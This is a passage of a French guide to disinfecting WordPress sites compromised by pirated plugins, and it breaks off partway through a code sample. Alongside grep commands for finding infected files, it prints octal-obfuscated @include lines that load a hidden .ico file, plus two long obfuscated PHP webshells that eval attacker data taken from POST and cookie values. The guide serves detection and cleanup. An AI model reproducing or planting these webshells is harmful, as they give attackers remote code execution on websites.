!<\/p>\n<p>En g\u00e9n\u00e9ral il infecte \u00e9galement le fichier \/wp-include\/functions.php qu&#8217;il vous faudra \u00e9galement d\u00e9sinfecter.<\/p>\n<p>&nbsp;<\/p>\n<p>Nous ne pouvons que vous conseiller de supprimer les plugins crack\u00e9s\/nulled en cause bien que supprimer la partie infect\u00e9e suffise. Non seulement cela est ill\u00e9gal mais les plugins pirat\u00e9s sont toujours plus ou moins infect\u00e9 d&#8217;une mani\u00e8re ou d&#8217;une autre.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: center;\"><strong>N&#8217;oubliez pas : si c&#8217;est gratuit, c&#8217;est vous le produit\u00a0<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>Analysez les fichiers natifs du core WordPress<\/h3>\n<p>&nbsp;<\/p>\n<p>Premi\u00e8re chose \u00e0 faire : v\u00e9rifier si les fichiers natifs du WordPress ont \u00e9t\u00e9s modifi\u00e9s. C&#8217;est l&#8217;\u00e9tape la plus simple, il vous suffit pour cela d&#8217;ex\u00e9cuter la commande suivante :<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">nano \/var\/www\/wordpress\/index.php\r\nnano \/var\/www\/wordpress\/wp-config.php\r\nnano \/var\/www\/wordpress\/wp-settings.php\r\n<\/pre>\n<p>Et de v\u00e9rifier si ces fichiers contiennent en haut ou en bas, du code chiffr\u00e9 ou un &#8220;@include&#8221;. Cela peut soit \u00eatre une suite de lettres et de mots incompr\u00e9hensibles, soit du code en base64.<\/p>\n<p>Si c&#8217;est le cas : <strong>supprimez-les<\/strong>.<\/p>\n<p>&nbsp;<\/p>\n<p>Vous pouvez aussi utiliser cette commande pour lister les fichiers .php contenant des &#8220;@include&#8221; :<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">grep -r -i --include=\\*.php '*\/ @include' \/var\/www\/<\/pre>\n<p>&nbsp;<\/p>\n<p>Exemple de code infect\u00e9 :<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057var\\057www\\057htm\\154\/wp\\055inc\\154ude\\163\/Si\\155ple\\120ie\/\\056639\\146691\\061.ic\\157\";\r\n@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057va\\162\/w\\167w\/\\150tm\\154\/w\\160-i\\156cl\\165de\\163\/S\\151mp\\154eP\\151e\/\\05663\\071f6\\07111\\056ic\\157\";\r\n@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057var\/\\167ww\/h\\164ml\/w\\160-inc\\154udes\\057Simp\\154ePie\\057.639\\1466911\\056ico\";\r\n@include \"\\057v\\141r\\057w\\167w\\057h\\164m\\154\/\\167p\\055i\\156c\\154u\\144e\\163\/\\123i\\155p\\154e\\120i\\145\/\\0566\\0639\\1466\\0711\\061.\\151c\\157\";\r\n@include \"\\057var\\057www\\057htm\\154\/wp\\055inc\\154ude\\163\/Si\\155ple\\120ie\/\\056639\\146691\\061.ic\\157\";\r\n@include \"\\057va\\162\/w\\167w\/\\150tm\\154\/w\\160-i\\156cl\\165de\\163\/S\\151mp\\154eP\\151e\/\\05663\\071f6\\07111\\056ic\\157\";\r\n@include \"\\057v\\141r\\057w\\167w\\057h\\164m\\154\/\\167p\\055i\\156c\\154u\\144e\\163\/\\123i\\155p\\154e\\120i\\145\/\\0566\\0639\\1466\\0711\\061.\\151c\\157\";\r\n@include \"\\057va\\162\/w\\167w\/\\150tm\\154\/w\\160-i\\156cl\\165de\\163\/S\\151mp\\154eP\\151e\/\\05663\\071f6\\07111\\056ic\\157\";<\/pre>\n<p><a href=\"https:\/\/wordpress.org\/support\/topic\/2-important-issues-found\/\">Il s&#8217;agit de ce type de malware<\/a> : webshell obfusqu\u00e9 en .ico inject\u00e9 par droppeur (vous avez du t\u00e9l\u00e9charger un plugin sur une source non officielle).<\/p>\n<p>&nbsp;<\/p>\n<p>Une fois d\u00e9chiffr\u00e9 sur <a href=\"https:\/\/www.unphp.net\">https:\/\/www.unphp.net<\/a>, on se rend compte qu&#8217;il y a de multiples shellcodes en .ico qu&#8217;il vous faudra supprimer :<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";@include \"\/var\/www\/html\/wp-includes\/SimplePie\/.639f6911.ico\";<\/pre>\n<p>Supprimez les puis avec la commande suivante d\u00e9celez s&#8217;il existe d&#8217;autres .ico infect\u00e9 :<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">grep -r -i --include=\\*.ico 'preg_replace' \/var\/www\/<\/pre>\n<p>En g\u00e9n\u00e9ral cela ne suffit pas, le coeur du malware doit \u00eatre \u00e9limin\u00e9 pour supprimer toute r\u00e9g\u00e9n\u00e9ration. Pour le trouver, voici quelques \u00e9tapes \u00e0 suivre :<\/p>\n<p>&nbsp;<\/p>\n<h3>Recherchez les fichiers contenant du code chiffr\u00e9 et\/ou en base64<\/h3>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">grep -Er '[A-Za-z0-9+\/]{4}*([A-Za-z0-9+\/]{4}|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{2}==)' \/var\/www\/wordpress\/*\r\ngrep -Erl '[[:alnum:]\/+]{20,}' \/var\/www\/wordpress\/*\r\ngrep -rl 'base64_encode' \/var\/www\/wordpress\/*\r\n<\/pre>\n<p>Ces lignes de commandes afficheront tous les fichiers contenant du code suspect. Il ne restera plus qu&#8217;\u00e0 les analyser un par un.<\/p>\n<p>Voici quelques exemples de malwares chiffr\u00e9s :<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">&lt;?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $a2b51c7d0 = 290;$GLOBALS['kf0800b21'] = Array();global $kf0800b21;$kf0800b21 = $GLOBALS;${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}['e7ad307'] = \"\\x27\\x75\\x34\\x20\\x79\\x7e\\x7a\\x7b\\x43\\x21\\x38\\x4e\\x51\\x47\\x63\\x29\\x55\\x59\\x42\\x5b\\x77\\x61\\x62\\x4c\\x23\\x53\\x71\\x68\\x22\\x5d\\x3f\\x58\\x2c\\x72\\x6f\\x24\\x6b\\x3e\\xd\\x35\\x78\\x37\\x5e\\x32\\x57\\x54\\x6c\\x73\\x76\\x66\\x65\\x69\\x4d\\x5a\\x9\\x33\\x3c\\xa\\x36\\x5c\\x67\\x60\\x50\\x7c\\x64\\x6e\\x3a\\x40\\x46\\x4a\\x7d\\x2e\\x2f\\x25\\x45\\x39\\x70\\x31\\x5f\\x3b\\x49\\x30\\x26\\x3d\\x52\\x48\\x2a\\x6a\\x6d\\x44\\x4b\\x56\\x2d\\x28\\x4f\\x2b\\x41\\x74\";$kf0800b21[$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][50]] = $kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][27].$kf0800b21['e7ad307'][33];$kf0800b21[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][75]] = $kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][64];$kf0800b21[$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55]] = $kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][65];$kf0800b21[$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][21]] = $kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][65].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][97];$kf0800b21[$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][64]] = $kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][6].$kf0800b21['e7ad307'][50];$kf0800b21[$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][41]] = $kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][27].$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][48].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][65];$kf0800b21[$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][75]] = $kf0800b21['e7ad307'][1].$kf0800b21['e7ad307'][65].$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][6].$kf0800b21['e7ad307'][50];$kf0800b21[$kf0800b21['e7ad307'][27].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][41]] = $kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][50];$kf0800b21[$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][50]] = $kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][88].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][88].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][97];$kf0800b21[$kf0800b21['e7ad307'][26].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][64]] = $kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][2];$kf0800b21[$kf0800b21['e7ad307'][60].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][81]] = $kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][43];$kf0800b21[$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][50]] = $_POST;$kf0800b21[$kf0800b21['e7ad307'][40].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][2]] = $_COOKIE;@$kf0800b21[$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][21]]($kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][60], NULL);@$kf0800b21[$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][21]]($kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][60].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][47], 0);@$kf0800b21[$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][21]]($kf0800b21['e7ad307'][88].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][40].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][40].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][1].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][65].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][88].$kf0800b21['e7ad307'][50], 0);@$kf0800b21[$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][50]](0);$u63f1 = NULL;$p39bec = NULL;$kf0800b21[$kf0800b21['e7ad307'][20].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][10]] = $kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][64];global $w9af8;function  a862($u63f1, $b7d73df){global $kf0800b21;$l669cad = \"\";for ($l7574d672=0; $l7574d672&lt;$kf0800b21[$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55]]($u63f1);){for ($p596=0; $p596&lt;$kf0800b21[$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55]]($b7d73df) &amp;&amp; $l7574d672&lt;$kf0800b21[$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55]]($u63f1); $p596++, $l7574d672++){$l669cad .= $kf0800b21[$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][50]]($kf0800b21[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][75]]($u63f1[$l7574d672]) ^ $kf0800b21[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][75]]($b7d73df[$p596]));}}return $l669cad;}function  t94afa4($u63f1, $b7d73df){global $kf0800b21;global $w9af8;return $kf0800b21[$kf0800b21['e7ad307'][60].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][81]]($kf0800b21[$kf0800b21['e7ad307'][60].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][81]]($u63f1, $w9af8), $b7d73df);}foreach ($kf0800b21[$kf0800b21['e7ad307'][40].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][2]] as $b7d73df=&gt;$i98b42){$u63f1 = $i98b42;$p39bec = $b7d73df;}if (!$u63f1){foreach ($kf0800b21[$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][50]] as $b7d73df=&gt;$i98b42){$u63f1 = $i98b42;$p39bec = $b7d73df;}}$u63f1 = @$kf0800b21[$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][75]]($kf0800b21[$kf0800b21['e7ad307'][26].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][64]]($kf0800b21[$kf0800b21['e7ad307'][27].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][41]]($u63f1), $p39bec));if (isset($u63f1[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][36]]) &amp;&amp; $w9af8==$u63f1[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][36]]){if ($u63f1[$kf0800b21['e7ad307'][21]] == $kf0800b21['e7ad307'][51]){$l7574d672 = Array($kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][48] =&gt; @$kf0800b21[$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][41]](),$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][48] =&gt; $kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][71].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][77],);echo @$kf0800b21[$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][64]]($l7574d672);}elseif ($u63f1[$kf0800b21['e7ad307'][21]] == $kf0800b21['e7ad307'][50]){eval\/*c4033*\/($u63f1[$kf0800b21['e7ad307'][64]]);}exit();} ?&gt;<\/pre>\n<p>&nbsp;<\/p>\n<p>Le plus souvent ils sont inject\u00e9s dans des fichiers coeurs de WordPress. Les structures sont toujours similaires :<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">&lt;?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $a078e82 = 840;$GLOBALS['v048a'] = Array();global $v048a;$v048a = $GLOBALS;${\"GLOBALS\"}['e7a5745b2'] = \"3A^neQ8D*Kl+=gOf]v9!P.ITV&amp;W2J,|Y#\\x9i5rwM4 s:C~;?ES\\xdu`a[%z1U}yLq(@HBFmdGN'\\x0\\xaX{&lt;\"7oc$_h)Zb-\/&gt;pjR6tk\";$v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][80]] = $v048a['e7a5745b2'][82].$v048a['e7a5745b2'][85].$v048a['e7a5745b2'][36];$v048a[$v048a['e7a5745b2'][50].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][80]] = $v048a['e7a5745b2'][81].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][68];$v048a[$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][35]] = $v048a['e7a5745b2'][41].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][3];$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][88]] = $v048a['e7a5745b2'][34].$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][96];$v048a[$v048a['e7a5745b2'][59].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][6]] = $v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][55].$v048a['e7a5745b2'][4];$v048a[$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][0].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][80]] = $v048a['e7a5745b2'][92].$v048a['e7a5745b2'][85].$v048a['e7a5745b2'][92].$v048a['e7a5745b2'][17].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][3];$v048a[$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][52]] = $v048a['e7a5745b2'][50].$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][55].$v048a['e7a5745b2'][4];$v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][82]] = $v048a['e7a5745b2'][88].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][4];$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][68]] = $v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][67].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][67].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][96];$v048a[$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][95]] = $v048a['e7a5745b2'][13].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][27];$v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56]] = $v048a['e7a5745b2'][73].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][82];$v048a[$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][15]] = $_POST;$v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][95]] = $_COOKIE;@$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][88]]($v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][13], 